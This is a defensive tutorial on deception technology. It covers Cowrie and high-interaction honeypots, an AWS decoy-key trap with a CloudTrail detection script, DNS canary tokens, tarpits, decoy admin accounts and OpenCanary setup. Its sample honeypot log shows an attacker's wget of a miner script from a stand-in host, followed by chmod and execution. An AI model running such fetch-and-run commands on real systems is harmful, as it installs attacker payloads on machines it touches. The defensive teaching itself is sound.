Defenders have to be right 100% of the time. Attackers only have to be right once. This asymmetry is unfair. Deception Technology flips the script. By planting fake servers, fake users, and fake files, we force the attacker to be right 100% of the time. If they touch ONE fake asset, they reveal themselves.

The Perfect Alarm

IDS/IPS generate thousands of false positives. A Honey Pot generates ZERO false positives. No legitimate user should ever try to log into `SQL-Backups-2022`. If someone does, it is an incident. Immediate Investigation.

1. Honey Pots: The Fake Server

A computer system sacrificed to lure hackers. We want them to attack it so we can study their behavior (Intelligence) or distract them from real assets (Defense).

1.1. Low Interaction (Cowrie)

This is a script that emulates a service. Cowrie is a famous SSH honeypot. It pretends to be a Linux server and lets the hacker log in with `root/123456`.
It logs everything they type, but they aren't on a real system: the "file system" is fake.

```text
# Cowrie Output Log
[attacker] login attempt root/123456 succeeded
[attacker] wget http://malware.com/miner.sh
[attacker] chmod +x miner.sh
[attacker] ./miner.sh
```

1.2. High Interaction

This is a real, vulnerable Windows Server 2012 running in a heavily monitored VM.
Risk: If the hacker is skilled, they might escape the VM or use it to launch DDoS attacks. High risk, high reward (you capture zero-days).

2. Honey Tokens: The Fake Data

Setting up fake servers is hard. Setting up fake data is easy. Fake data planted purely to detect access is called a Canary Token.

2.1. The AWS Key Trap

Create an AWS IAM User. Give it ZERO permissions. Generate an Access Key ID and Secret Key.
Place these keys in a file called `aws_credentials.txt` on your developers' laptops.
Configure CloudTrail to alert you via PagerDuty the millisecond anyone tries to use that key.
If a developer's laptop is compromised, the hacker WILL steal that file and try to use it. You catch them instantly.
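As an added example (not code from the original page), here is the detection side of this trap: it scans CloudTrail records for any API call made with a planted key, whatever the outcome, because a zero-permission key still authenticates and so still produces an `AccessDenied` event. The key IDs, user names and records are constructed placeholders, and the scanner also accepts the `Records` bundle format CloudTrail writes to S3, not just single events.

```python
import json

# Decoy IAM users' access key IDs (zero permissions); placeholder values, not real keys.
DECOY_ACCESS_KEY_IDS = {"AKIAIOSFODNN7DECOY01"}

# Constructed CloudTrail records, one JSON document per line: two bare events,
# then a "Records" bundle in the shape CloudTrail delivers to S3.
SAMPLE_CLOUDTRAIL_LINES = [
    json.dumps({"eventTime": "2024-03-01T10:15:02Z", "eventName": "ListBuckets",
                "eventSource": "s3.amazonaws.com", "sourceIPAddress": "198.51.100.23",
                "userIdentity": {"type": "IAMUser", "userName": "svc-backup",
                                 "accessKeyId": "AKIAIOSFODNN7DECOY01"},
                "errorCode": "AccessDenied"}),
    json.dumps({"eventTime": "2024-03-01T10:15:05Z", "eventName": "DescribeInstances",
                "eventSource": "ec2.amazonaws.com", "sourceIPAddress": "10.0.4.12",
                "userIdentity": {"type": "IAMUser", "userName": "alice",
                                 "accessKeyId": "AKIAIOSFODNN7REALKEY"}}),
    json.dumps({"Records": [{"eventTime": "2024-03-01T10:16:40Z",
                             "eventName": "GetCallerIdentity",
                             "eventSource": "sts.amazonaws.com",
                             "sourceIPAddress": "198.51.100.23",
                             "userIdentity": {"type": "IAMUser", "userName": "svc-backup",
                                              "accessKeyId": "AKIAIOSFODNN7DECOY01"}}]}),
]

def _events(line):
    """Yield CloudTrail events from one line: a bare event or a Records bundle."""
    try:
        doc = json.loads(line)
    except ValueError:
        return  # not JSON: skip rather than crash the pipeline
    if isinstance(doc, dict) and isinstance(doc.get("Records"), list):
        yield from doc["Records"]
    elif isinstance(doc, dict):
        yield doc

def decoy_key_alerts(lines, decoy_keys=DECOY_ACCESS_KEY_IDS):
    """One alert per API call made with a planted key. The outcome is ignored:
    a zero-permission key still authenticates, so even the AccessDenied event
    proves someone holds the credential. Every hit is an incident."""
    alerts = []
    for line in lines:
        for ev in _events(line):
            key = ev.get("userIdentity", {}).get("accessKeyId")
            if key in decoy_keys:
                alerts.append({"time": ev.get("eventTime"), "key": key,
                               "source_ip": ev.get("sourceIPAddress"),
                               "call": f'{ev.get("eventSource")}:{ev.get("eventName")}',
                               "outcome": ev.get("errorCode", "Success")})
    return alerts
```

Running `decoy_key_alerts(SAMPLE_CLOUDTRAIL_LINES)` yields two alerts from 198.51.100.23 and none for the legitimate key.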

2.2. The DNS Token

Canarytokens.org allows you to generate a special DNS hostname (e.g., `x83d.canarytokens.com`).
Embed this into a Word Document, a PDF, or even a SQL database trigger.
When the file is opened, it tries to resolve the domain. The DNS server records the IP address of the resolver.
Use Case: Put a file named "Employee_Salaries.docx" on a file share. If it is opened, you know who (IP) is snooping.

3. Active Defense Strategy

Deception is about slowing the adversary down.

3.1. The Tarpit

A Tarpit (like LaBrea) answers connection requests on unused IP addresses. It completes the TCP handshake but sets the "Window Size" to zero or answers incredibly slowly (1 byte per minute).
This traps the attacker's scanning tools/threads, wasting their time and resources.

3.2. Fake Active Directory Accounts

Create a Domain Admin account named `aadministrator`. Give it a complex 100-character password that no one will ever legitimately type.
Plant the hash of this password in memory (a HoneyHash).
If an attacker uses Mimikatz to dump memory, they see this "juicy" admin hash. They try to Pass-the-Hash.
Your Domain Controller sees a login attempt for `aadministrator`. Boom. Detection.

4. Implementing CanaryTokens (Hands On)

You can self-host your own canary console with OpenCanary.

```bash
# Install OpenCanary on Ubuntu
sudo apt-get install python3-dev python3-pip virtualenv
virtualenv env/
. env/bin/activate
pip install opencanary
opencanaryd --copyconfig

# Edit config to enable services (FTP, HTTP, SSH).
# Each service has its own enabled/port keys in the JSON file, e.g. for FTP:
#   "ftp.enabled": true,
#   "ftp.port": 21,
nano /etc/opencanaryd/opencanary.conf
```

Legal Warning

Do NOT Hack Back.
It is illegal to counter-attack the hacker's IP (it might be an innocent grandma's PC being used as a proxy).
Deception is legal because it happens on YOUR network. You are allowed to lie to intruders in your own house.